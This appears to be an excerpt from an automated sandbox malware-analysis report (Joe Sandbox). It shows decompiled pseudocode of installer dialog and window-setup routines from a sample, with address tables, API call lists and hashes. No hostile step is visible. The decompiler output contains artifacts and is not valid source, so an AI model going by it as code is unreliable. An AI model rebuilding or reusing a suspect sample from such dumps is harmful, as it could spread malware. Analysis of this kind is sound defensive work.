                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x42d250 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x434f08 = _t127;
                                                						 *0x42d264 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x42b230 = _t91;
                                                						E00404499(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                						 *0x433ecc = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x42d250 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x0
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x434f20;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044E5(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x42d250;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x0
                                                							__eflags = _t38 -  *0x434f24;
                                                							if(_t38 ==  *0x434f24) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x433ecc - _t136;
                                                							if( *0x433ecc != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404499(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x434f8c - _t136;
                                                							_v28 = _t48;
                                                							if( *0x434f8c != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E004044BB(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x42b230, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x434f8c - _t136;
                                                							if( *0x434f8c == _t136) {
                                                								_push( *0x42d264);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x42b230);
                                                							}
                                                							E004044CE();
                                                							E0040653D(0x42d268, E00403F7B());
                                                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x42d268); // executed
                                                							_push(_t136);
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x433ed8); // executed
                                                									 *0x42c240 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x433ed8 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404499(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									_push(_t136);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                									__eflags =  *0x433ecc - _t136;
                                                									if( *0x433ecc != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x433ed8, 8); // executed
                                                									E004044E5(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x434f8c - _t136;
                                                								if( *0x434f8c != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x434f80 - _t136;
                                                								if( *0x434f80 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x434f08 = _t136;
                                                						EndDialog(_t127,  *0x42ba38);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                						__eflags =  *0x433ecc;
                                                						return 0 |  *0x433ecc == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x434f8c - _t136;
                                                											if( *0x434f8c == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x42ba38 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E00404472();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x42ba38 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x0
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x433ed8 = _t122;
                                                						L60:
                                                						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x42f268 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E00404500(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
                                                						}
                                                					}
                                                				}
                                                			}































                                                0x00403fa5
                                                0x00403fac
                                                0x00404113
                                                0x00404117
                                                0x0040411b
                                                0x0040411d
                                                0x00404122
                                                0x0040412d
                                                0x00404138
                                                0x0040413d
                                                0x0040413f
                                                0x00404141
                                                0x00404144
                                                0x00404149
                                                0x00404157
                                                0x00404164
                                                0x0040416b
                                                0x0040416b
                                                0x0040416c
                                                0x0040416c
                                                0x00404171
                                                0x00404177
                                                0x0040417e
                                                0x00404184
                                                0x00404186
                                                0x004041c6
                                                0x004041cb
                                                0x004041d0
                                                0x004041d0
                                                0x004041d5
                                                0x004041de
                                                0x004041e0
                                                0x004041e5
                                                0x004041eb
                                                0x004041ef
                                                0x004041ef
                                                0x004041f4
                                                0x004041fa
                                                0x00000000
                                                0x00000000
                                                0x00404205
                                                0x0040420b
                                                0x00000000
                                                0x00000000
                                                0x00404214
                                                0x0040421c
                                                0x00404221
                                                0x00404224
                                                0x0040422a
                                                0x0040422f
                                                0x00404232
                                                0x00404238
                                                0x0040423d
                                                0x00404240
                                                0x00404246
                                                0x0040424e
                                                0x00404254
                                                0x0040425a
                                                0x0040425e
                                                0x00404265
                                                0x00404265
                                                0x00404265
                                                0x0040426f
                                                0x00404281
                                                0x0040428d
                                                0x00404292
                                                0x0040429c
                                                0x004042a2
                                                0x004042a4
                                                0x004042a9
                                                0x004042a6
                                                0x004042a6
                                                0x004042a6
                                                0x004042b9
                                                0x004042d1
                                                0x004042d3
                                                0x004042d9
                                                0x004042ee
                                                0x004042db
                                                0x004042e4
                                                0x004042e6
                                                0x004042e6
                                                0x004042f4
                                                0x00404305
                                                0x0040431b
                                                0x00404322
                                                0x00404328
                                                0x0040432c
                                                0x00404331
                                                0x00404333
                                                0x00000000
                                                0x00404339
                                                0x00404339
                                                0x0040433b
                                                0x00000000
                                                0x00000000
                                                0x00404341
                                                0x00404345
                                                0x0040436a
                                                0x00404370
                                                0x00404376
                                                0x00404378
                                                0x00000000
                                                0x00000000
                                                0x0040439e
                                                0x004043a4
                                                0x004043a6
                                                0x004043ab
                                                0x00000000
                                                0x00000000
                                                0x004043b1
                                                0x004043b4
                                                0x004043b7
                                                0x004043ce
                                                0x004043da
                                                0x004043f3
                                                0x004043f9
                                                0x004043fd
                                                0x00404402
                                                0x00404408
                                                0x00000000
                                                0x00000000
                                                0x00404412
                                                0x0040441d
                                                0x00000000
                                                0x0040441d
                                                0x00404347
                                                0x0040434d
                                                0x00000000
                                                0x00000000
                                                0x00404353
                                                0x00404359
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040435f
                                                0x00404333
                                                0x0040442a
                                                0x00404436
                                                0x0040443d
                                                0x00000000
                                                0x00404188
                                                0x00404188
                                                0x0040418b
                                                0x004041be
                                                0x004041be
                                                0x004041c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004041c0
                                                0x0040418d
                                                0x00404191
                                                0x00404196
                                                0x00404198
                                                0x00000000
                                                0x00000000
                                                0x004041a8
                                                0x004041b0
                                                0x00000000
                                                0x004041b6
                                                0x00403fbe
                                                0x00403fbe
                                                0x00403fc2
                                                0x00403fc7
                                                0x00403fd6
                                                0x00403fd6
                                                0x00403fdc
                                                0x00403fe3
                                                0x00404027
                                                0x0040402d
                                                0x00404046
                                                0x00404049
                                                0x0040405c
                                                0x00404062
                                                0x00000000
                                                0x00000000
                                                0x00404068
                                                0x00404073
                                                0x00404075
                                                0x00404077
                                                0x00404096
                                                0x00404096
                                                0x00404099
                                                0x0040409e
                                                0x004040a1
                                                0x004040b1
                                                0x004040b2
                                                0x004040b4
                                                0x004040ea
                                                0x004040fa
                                                0x00000000
                                                0x004040fa
                                                0x004040b6
                                                0x004040bc
                                                0x004040d5
                                                0x004040da
                                                0x004040dc
                                                0x00000000
                                                0x00000000
                                                0x004040de
                                                0x004040ca
                                                0x004040ca
                                                0x004040cc
                                                0x004040cc
                                                0x00000000
                                                0x004040cc
                                                0x004040bf
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x004040a3
                                                0x004040a9
                                                0x00000000
                                                0x00000000
                                                0x004040ab
                                                0x00000000
                                                0x004040ab
                                                0x0040409b
                                                0x00000000
                                                0x0040409b
                                                0x00404081
                                                0x00404088
                                                0x0040408e
                                                0x00404090
                                                0x00404466
                                                0x00000000
                                                0x00404466
                                                0x00000000
                                                0x00404090
                                                0x0040404e
                                                0x00000000
                                                0x00404056
                                                0x00404035
                                                0x0040403b
                                                0x00404443
                                                0x00404449
                                                0x00404456
                                                0x0040445c
                                                0x0040445c
                                                0x00000000
                                                0x00403fe5
                                                0x00403fea
                                                0x00403ff6
                                                0x00403fff
                                                0x00404100
                                                0x00000000
                                                0x0040401e
                                                0x00404021
                                                0x00000000
                                                0x00404021
                                                0x00403fff
                                                0x00403fe3

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                • DestroyWindow.USER32 ref: 00404035
                                                • SetWindowLongW.USER32 ref: 0040404E
                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                • GetSystemMenu.USER32 ref: 004042B2
                                                • EnableMenuItem.USER32 ref: 004042B9
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                • SetWindowTextW.USER32 ref: 00404322
                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 121052019-0
                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 348 403d16-403d18 343->348 349 403d1a-403d1b call 405e58 343->349 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 348->339 348->349 349->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 359 403e95-403e97 355->359 360 403eb1-403eb3 call 40140b 359->360 361 403e99-403e9f 359->361 360->335 361->344 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->344 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                C-Code - Quality: 96%
                                                			E00403BEC(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x434f10;
                                                				_t22 = E0040690A(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x42d268;
                                                					L"1033" = 0x30;
                                                					 *0x442002 = 0x78;
                                                					 *0x442004 = 0;
                                                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                					__eflags =  *0x42d268;
                                                					if(__eflags == 0) {
                                                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403EC2(_t78, _t90);
                                                				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                				 *0x434f9c = 0x10000;
                                                				if(E00405F14(_t90, 0x440800) != 0) {
                                                					L16:
                                                					if(E00405F14(_t98, 0x440800) == 0) {
                                                						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                					}
                                                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x433ee8 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403EC2(_t78, __eflags);
                                                							__eflags =  *0x434fa0;
                                                							if( *0x434fa0 != 0) {
                                                								_t33 = E00405672(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x433ecc;
                                                								if( *0x433ecc == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x42d248, 5); // executed
                                                							_t39 = E0040689A("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040689A("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                								 *0x433ec4 = _t87;
                                                								RegisterClassW(0x433ea0);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                							E00403B3C(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x434f00;
                                                						 *0x433ea4 = E00401000;
                                                						 *0x433eb0 =  *0x434f00;
                                                						 *0x433eb4 = _t30;
                                                						 *0x433ec4 = 0x40a380;
                                                						if(RegisterClassW(0x433ea0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x432ea0;
                                                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                					_t63 =  *0x432ea0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x432ea2;
                                                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E0040653D(0x440800, E00405E0C(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E58(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403bf2
                                                0x00403bfb
                                                0x00403c02
                                                0x00403c04
                                                0x00403c18
                                                0x00403c2a
                                                0x00403c33
                                                0x00403c3c
                                                0x00403c43
                                                0x00403c48
                                                0x00403c4f
                                                0x00403c62
                                                0x00403c62
                                                0x00403c6d
                                                0x00403c06
                                                0x00403c11
                                                0x00403c11
                                                0x00403c72
                                                0x00403c85
                                                0x00403c8a
                                                0x00403c9b
                                                0x00403d2d
                                                0x00403d35
                                                0x00403d3e
                                                0x00403d3e
                                                0x00403d54
                                                0x00403d5a
                                                0x00403d68
                                                0x00403de9
                                                0x00403df1
                                                0x00403dfb
                                                0x00403e00
                                                0x00403e06
                                                0x00403e90
                                                0x00403e95
                                                0x00403e97
                                                0x00403eb3
                                                0x00000000
                                                0x00403eb3
                                                0x00403e99
                                                0x00403e9f
                                                0x00403ea7
                                                0x00403ea7
                                                0x00000000
                                                0x00403e9f
                                                0x00403e14
                                                0x00403e1f
                                                0x00403e24
                                                0x00403e26
                                                0x00403e2d
                                                0x00403e2d
                                                0x00403e38
                                                0x00403e40
                                                0x00403e42
                                                0x00403e44
                                                0x00403e4d
                                                0x00403e50
                                                0x00403e56
                                                0x00403e56
                                                0x00403e75
                                                0x00403e86
                                                0x00000000
                                                0x00403e8b
                                                0x00403df3
                                                0x00403df5
                                                0x00000000
                                                0x00403d6a
                                                0x00403d6a
                                                0x00403d76
                                                0x00403d80
                                                0x00403d86
                                                0x00403d8b
                                                0x00403d9a
                                                0x00403eb8
                                                0x00403eb8
                                                0x00000000
                                                0x00403eb8
                                                0x00403da9
                                                0x00403de4
                                                0x00000000
                                                0x00403de4
                                                0x00403ca1
                                                0x00403ca1
                                                0x00403ca4
                                                0x00403ca6
                                                0x00000000
                                                0x00000000
                                                0x00403cb4
                                                0x00403cc6
                                                0x00403ccb
                                                0x00403cd4
                                                0x00000000
                                                0x00000000
                                                0x00403cda
                                                0x00403cdc
                                                0x00403ce9
                                                0x00403ce9
                                                0x00403cf2
                                                0x00403cf8
                                                0x00403d20
                                                0x00403d28
                                                0x00000000
                                                0x00403d0a
                                                0x00403d0b
                                                0x00403d14
                                                0x00403d1a
                                                0x00403d1b
                                                0x00000000
                                                0x00403d1b
                                                0x00403d16
                                                0x00403d18
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d18
                                                0x00403cf8

                                                APIs
                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                • lstrcatW.KERNEL32 ref: 00403C6D
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                • LoadImageW.USER32 ref: 00403D54
                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                • RegisterClassW.USER32 ref: 00403D91
                                                • SystemParametersInfoW.USER32 ref: 00403DA9
                                                • CreateWindowExW.USER32 ref: 00403DDE
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403E14
                                                • GetClassInfoW.USER32 ref: 00403E40
                                                • GetClassInfoW.USER32 ref: 00403E4D
                                                • RegisterClassW.USER32 ref: 00403E56
                                                • DialogBoxParamW.USER32 ref: 00403E75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-2633365883
                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
